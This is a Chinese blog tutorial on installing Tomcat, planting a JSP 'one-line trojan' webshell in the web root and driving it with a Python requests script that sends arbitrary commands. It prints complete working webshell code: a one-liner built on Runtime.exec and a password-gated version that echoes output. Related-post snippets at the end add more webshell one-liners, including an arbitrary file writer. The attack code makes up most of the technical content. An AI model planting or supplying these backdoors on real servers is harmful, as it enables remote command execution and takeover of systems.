使用python连接JSP一句话木马

已于 2022-05-20 10:44:17 修改
阅读量3.5k 收藏 6
点赞数 1
分类专栏: python Web安全 文章标签: python tomcat linux
于 2021-08-24 22:14:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45254208/article/details/119899263
版权

首先需要安装tomcat。

去官网 http://tomcat.apache.org/ 下载对应的 Linux 版本。

这里,我下载的是 apache-tomcat-8.5.70.tar.gz
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
最好提前安装好 JDK1.8 ,因为 kali 自带的那个可能会出现一点问题。

这是我遇到的问题,随手记录了一下。

https://blog.csdn.net/weixin_45254208/article/details/119897865

不过你也可以不重装,等出了问题再重装,万一你的电脑就没有我这种情况呢。

在这里插入图片描述

好了,回到 tomcat 的安装这个问题上来。

解压缩下载好的安装包。

tar -zxvf apache-tomcat-8.5.70.tar.gz

将解压后的目录,移动到 /usr/local/ 目录下。

然后,使用命令 vim /etc/profile 配置环境变量,权限不够就加 sudo

在文档最下方添加以下环境变量配置代码

export CATALINA_HOME=/usr/local/software/tomcat8.5.70

在这里插入图片描述
使用命令 source /etc/profile 让配置立即生效。

进入 tomcat 安装目录的 bin 目录,执行 ./startup.sh,看到如图提示代表启动成功。

在这里插入图片描述
在这里插入图片描述

接下来才是重点,前面那都是安装和配置环节。

tomcat 的跟目录在 /usr/local/apache-tomcat-8.5.70/webapps/ROOT ,在该路目中写一个 JSP 一句话木马,名为 shell.jsp ,如下图所示(我已提前写好)。

在这里插入图片描述
最简单的 JSP 一句话,其内容为:

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

不过,我用的是另外一个 webshell ,稍微长一点。

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>

    <body>
        <%
        if ("shell".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>

其中,shell 是连接密码,变量 cmd 用于接收参数。

在 Windows 本机验证一下。

在这里插入图片描述
在这里插入图片描述

但是,既然标题说的是用python连接,那我当然不能忘了。

其实代码十分简单,无非就是使用 python 的 requests 库,发送请求,传递参数,执行命令。

import requests

url = str(input('目标URL:'))      # http://192.168.223.130:8080/shell.jsp
pwd = str(input('连接密码:'))      # 其实就是一句话木马中的变量shell

while(True):
    cmd = str(input('想要执行的命令:'))

    # 将命令传给 JSP 一句话木马
    payload = {
        'pwd': '{}'.format(pwd),
        'cmd': '{}'.format(cmd)
    }


    # 向目标url发送post请求
    response = requests.post(url=url, params=payload)

    # 回显命令执行的结果
    print(response.text)

结果如下:

在这里插入图片描述
在这里插入图片描述

在此基础上,可以更加深入一点,最终开发出一个 webshell 的连接管理工具,也不是不可以。

如果本文对你有用的话,欢迎点赞收藏。

hangshao0.0
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一句木马JSP
09-21 8706
JSP一句收集: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ...
tomcat下jsp shell(webshell)
夜行者~@
11-10 8655
首先要了解,什么是服务器,什么是web,服务器就是和电脑一样的,有操作系统,操作系统与磁盘,网卡,内存等等组合起来的就叫服务器,web内,是服务器上面的一个应用,tomcat就是一个应用,可以解析jsp文件,tomat运行之后,丢jsp进去,可以马上解析jsp文件,tomcat运行之后java sdk以及运行,jsp可以条用java sdk api,java api可以条用系统shell,这样就形...
tomcat put方法任意写文件漏洞
weixin_48739941的博客
04-21 2852
(1)cd vulhub/tomcat/CVE-2017-12615 切换目录。 (2) docker-compose up -d 启动。 (3)访问:http://192.168.43.137:8080/ (4)burpsuite抓包。 (5)send to repeater,修改为PUT /l3yx.txt。 (6) docker exec -it 3e7 bash ; cd webapps/ ;cd ROOT ;cat l3yx.txt进入容器,查看。 ...
java安全——jsp一句木马
最新发布
Innocence_0的博客
05-30 546
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~不会回显执行的结果只能在后台打印一个地址,常用来反弹shell。如果你对网络安全入门感兴趣,那么你需要的可以。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。③安全攻防357页笔记。⑥HW护网行动经验总结。⑦100个漏洞实战案例。⑤安全红队渗透工具包。
蚁剑jsp一句木马
jennycisp的博客
12-25 2822
密码为 passwd。
jsp小后门
Jiajia2017的博客
12-18 1051
转自  http://zone.wooyun.org/content/17356  园长 一:执行系统命令:无回显执行系统命令:<%Runtime.getRuntime().exec(request.getParameter("i"));%>请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,...
使用Python连接KingBase(数据库)的库
07-30
使用Python连接KingBase(数据库)的库
Python连接使用MySQL数据库
07-03
这是一篇介绍python连接使用mysql数据库的文档,介绍了python对mysql数据库的insert、update、delete等基本操作。
Python 一句生成字母表的方法
09-19
今天小编就为大家分享一篇Python 一句生成字母表的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
使用python连接wifi,批量猜测wifi密码
01-16
本程序介绍了如何使用Python编程语言编写一个简单的连接Wi-Fi的程序。首先准备密码本,然后进行连接准备工作,包括安装Python环境和下载安装pywifi库。接着创建无线对象获取无线网卡,创建WiFi连接文件并选择要连接...
python使用socket连接远程服务器的方法
09-22
主要介绍了python使用socket连接远程服务器的方法,涉及Python中socket通信的基本技巧,具有一定参考借鉴价值,需要的朋友可以参考下
Java安全-Java Web后门学习 Jsp 一句分析
Love&Share
05-03 2373
文章目录Java Web后门一句木马反射调用类加载(冰蝎马实现方式)ELSE参考 Java Web后门 Java 是强类型语言,不能够像 PHP 那样利用字符串组合当作系统函数使用 Java 中常用的命令执行函数 java.lang.Runtime.exec() java.lang.ProcessBuilder.start() 一句木马 最简单的 jsp 一句木马 <% Runtime.getRuntime().exec(request.getParameter("i"));%> .
JSP运行Shell并返回结果
huplion的专栏
04-02 2727
在JavaWeb项目中添加一个jsp文件,此处以shell.jsp为例<%@page import="java.io.IOException"%> <%@page import="java.io.InputStreamReader"%> <%@page import="java.io.BufferedReader"%> <%@ page language="java" import="java.ut
一句木马该怎么实现?现在就带你了解
dzqxwzoe的博客
02-15 892
一直以来,Java一句木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句木马:利用Java中JS引擎实现的一句木马。基于JS引擎的Java一句体积更小,变化种类更多,使用起来更灵活。
jsp一句木马
山兔的博客
04-07 2248
<%eval request ("pass")%>
Python分段输出一句
03-07
Python中可以使用多种方式实现分段输出一句,以下是其中的一种方式: ```python print("这是第一段") print("这是第二段") print("这是第三段") ``` 这段代码会依次输出三段,每段占一行。你可以根据需要修改每段的内容。如果你想在同一行输出多段,可以使用逗号分隔: ```python print("这是第一段", end="") print("这是第二段", end="") print("这是第三段") ``` 这样就会在同一行输出三段。如果你想要更多的分段输出方式,可以告诉我,我可以提供更多的方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值